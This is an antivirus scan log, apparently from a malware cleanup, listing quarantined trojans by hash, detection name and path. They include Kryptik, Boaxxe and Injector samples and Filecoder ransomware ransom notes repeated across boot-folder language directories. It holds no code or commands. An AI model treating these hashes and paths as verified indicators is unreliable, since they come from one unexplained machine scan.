sh=860059EC7A677C9987005A76321BB5A6A9176CBA ft=1 fh=be6a67a6f4829cc6 vn="a variant of Win32/Kryptik.DUHI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\crypted.old"
sh=9505BC892377082519A566D3A1E7CC741F642A9E ft=1 fh=b5a7ea26f3487e8e vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\frivolled.dll.old"
sh=22A351636C98A10DF50BE1B6F348DF42CBB3C511 ft=1 fh=09a81671feade241 vn="a variant of Win32/Injector.CHAI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\tmp3740.exe"
sh=2482644F8D1773A2BED5268F89BB9F693C062AB9 ft=1 fh=3b0a9130d4e9283d vn="a variant of Win32/Injector.CGWF trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\tmpA932.exe"
sh=364EF3CFC33D1A9AB7FA9353CF41DCD1C8F614E1 ft=1 fh=fc66eaf1c1ccf4af vn="a variant of Win32/Kryptik.DVGD trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\comNetengine.dll"
sh=318CAD37446D8C72D7FF5BF9BC990C38FA709903 ft=1 fh=c0db1b1bf4829cc6 vn="a variant of Win32/Kryptik.DUHI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\crypted"
sh=5893079BDF4C14F01D2D4A9E21FD63CE47EE8592 ft=1 fh=2518f7b7f3487e8e vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\frivolled.dll"
sh=6E9AAC0FB67A0D8A50EA1E9976CEDC1CC040DCF0 ft=1 fh=f51321ce98f6db54 vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\reinfects.dll"
sh=BD3233BA5B36B19F98948BBBE991BCF289A3B562 ft=1 fh=86f241c06c002bf0 vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\uroses.dll"
sh=CABAC1C115B6C2C35CE1AD62B2D5746816A4CF41 ft=1 fh=f027039458059b35 vn="a variant of Win32/Ponmocup.LX trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Roaming\scrrunp.dll.xBAD"
sh=45E7DBD54F217A4A6852AE87432B90A5CF5E5FC9 ft=1 fh=f408c08e8a312898 vn="a variant of Win32/Kryptik.DVHC trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Roaming\FireFoxUpdServeis\[email protected]"
sh=DCD9529F41089A9738F9AA5CE764A42B13DE3D4E ft=1 fh=049d85f4591bd93a vn="a variant of Win32/Kryptik.DVFC trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Roaming\GoogleUpdate\ChromeUpdate.exe"
sh=3858994D2B8C9D8B87C826A46C05CF60A790DAA6 ft=1 fh=8a1e5e1d58892132 vn="a variant of Win32/Toolbar.Visicom.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Program Files (x86)\Panda Security\Panda Security Protection\Tools\PandaSecurityTb.exe"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\bg-bg\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\bg-bg\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\cs-cz\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\cs-cz\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\da-dk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\da-dk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\de-de\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\de-de\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\el-gr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\el-gr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\en-gb\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\en-gb\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\en-us\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\en-us\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\es-es\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\es-es\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\et-ee\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\et-ee\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\fi-fi\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\fi-fi\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\Fonts\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\Fonts\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\fr-fr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\fr-fr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\hr-hr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\hr-hr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\hu-hu\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\hu-hu\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\it-it\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\it-it\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ja-jp\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ja-jp\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ko-kr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ko-kr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\lt-lt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\lt-lt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\lv-lv\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\lv-lv\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\nb-no\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\nb-no\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\nl-nl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\nl-nl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pl-pl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pl-pl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-br\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-br\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-pt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-pt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ro-ro\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ro-ro\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ru-ru\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ru-ru\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sk-sk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sk-sk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sl-si\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sl-si\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sr-latn-rs\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sr-latn-rs\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sv-se\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sv-se\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\tr-tr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\tr-tr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\uk-ua\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\uk-ua\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-cn\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-cn\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-hk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-hk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-tw\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-tw\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\bg-bg\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\bg-bg\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\cs-cz\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\cs-cz\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\da-dk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\da-dk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\de-de\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\de-de\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\el-gr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\el-gr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-gb\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-gb\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-us\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-us\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\es-es\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\es-es\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\et-ee\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\et-ee\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fi-fi\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fi-fi\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fr-fr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fr-fr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hr-hr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hr-hr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hu-hu\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hu-hu\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\it-it\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\it-it\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ja-jp\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ja-jp\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ko-kr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ko-kr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lt-lt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lt-lt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lv-lv\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lv-lv\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nb-no\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nb-no\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nl-nl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nl-nl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pl-pl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pl-pl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-br\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-br\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-pt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-pt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ro-ro\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ro-ro\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ru-ru\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ru-ru\how_decrypt.html"
